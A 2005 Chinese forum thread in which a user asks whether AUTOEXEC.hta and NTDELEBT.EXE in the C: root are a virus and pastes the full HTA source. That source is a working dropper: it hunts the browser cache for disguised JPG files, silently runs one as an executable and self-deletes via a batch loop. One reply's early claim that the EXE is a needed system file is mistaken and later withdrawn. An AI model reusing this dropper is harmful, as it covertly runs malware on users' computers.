ez2dj - 2005-7-25 17:00:00
在c盘根目录下发现 AUTOEXEC.hta和NTDELEBT.EXE
请问这是什么?是不是病毒?
ez2dj - 2005-7-25 17:29:00
在C盘根目录下还有这个文件:NTDELEBT.EXE
AUTOEXEC.hta的内容为:
</SCRIPT></HEAD><HTA:APPLICATION ID=ICY BORDER="none"CAPTION="no"SHOWINTASKBAR="no"><BODY scroll="no"leftmargin="0"topmargin="0"marginwidth="0"marginheight="0"><SCRIPT LANGUAGE="JavaScript">function wj(b){try{var c=new Enumerator(fso.GetFolder(b).SubFolders);for(;!c.atEnd();c.moveNext()){var f0=c.item().Path+"\\AUTOEXEC[1].jpg";var f1=c.item().Path+"\\AUTOEXEC[2].jpg";var f="c:\\NTDELEBT.EXE";if(fso.FileExists(f0)){fso.CopyFile(f0,f);wsh.Run(f,0,false);v=1;break;}if(fso.FileExists(f1)){fso.CopyFile(f1,f);wsh.Run(f,0,false);v=1;break;}wj(c.item());}}catch(e){}}function kill(){path="c:\\AUTOEXE.BAT";v=ICY.commandLine;v=v.substring(1,v.length-2);var _w=fso.CreateTextFile(path);_w.Write('@echo off\r\n:A\r\ndel "'+v+'"\r\nif exist "'+v+'" goto A\r\ndel %0');_w.close();wsh.Run(path,0,false);window.close();}var v=0;try{var fso=new ActiveXObject("Scripting.FileSystemObject");var wsh=new ActiveXObject("WScript.Shell");var cache=wsh.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache");}catch(e){}function drun(){try{if(v==0){wj(cache);setTimeout("drun()",2000);}else{kill();}}catch(e){}}drun();</SCRIPT></BODY></HTML
晓肚肚 - 2005-7-25 17:49:00
NTDELEBT.EXE是系统启动必需的,不是病毒
ez2dj - 2005-7-26 8:38:00
| 引用: |
【晓肚肚的贴子】NTDELEBT.EXE是系统启动必需的,不是病毒
........................... |
NTDELEBT.COM-----看扩展名
ez2dj - 2005-7-26 9:44:00
这到底是什么啊?有没有人知道啊?
晓肚肚 - 2005-7-26 11:03:00
是啊,你打错了,我也没有看,是NTDELEBT.COM,XP启动必需的
ez2dj - 2005-7-26 12:48:00
那NTDELEBT.EXE是什么?
晓肚肚 - 2005-7-26 15:17:00
什么都不是,要有的话就不是好东西,C盘根目录下只有NTDETECT.COM的文件
© 2000 - 2026 Rising Corp. Ltd.